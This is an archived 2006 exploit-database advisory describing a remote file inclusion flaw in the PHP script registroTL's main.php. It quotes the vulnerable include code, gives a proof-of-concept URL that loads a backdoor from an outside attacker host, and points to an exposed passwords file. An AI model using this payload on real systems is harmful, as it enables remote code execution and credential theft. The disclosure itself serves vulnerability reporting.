[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : registroTL (main.php) Remote File Include Vulnerability
# Published : 2006-10-10
# Author : DarkFig
# Previous Title : TribunaLibre 3.12 Beta (ftag.php) Remote File Include Vulnerability
# Next Title : compteur v2 (param_editor.php) Remote File Include Vulnerability
#
# Title..: 7 php scripts File Inclusion Vuln / Source disclosure
# Credits: DarkFig
# Og.link: http://acid-root.new.fr/poc/13061007.txt
#
# Using http://www.google.com/codesearch
# Few examples about what we can do with a code search engine
# For educational purpose only.
#
# You can use regex in your research, this can be chaotic.
# What's your opinion about the google code search project ?
# Affected.scr: registroTL
# Download....: http://www.phplibre.com.es/downloads/registroTL.zip
# Poc.........: http://victim.com/main.php?page=ftp://hack.com/backdrphpext
# http://victim.com/usuarios.dat <- Passwords disclosure
# Vuln.code...: if (isset($_GET['page']) && file_exists($_GET['page'].".php"))
# include($_GET['page'].".php");
# www.Syue.com [2006-10-10]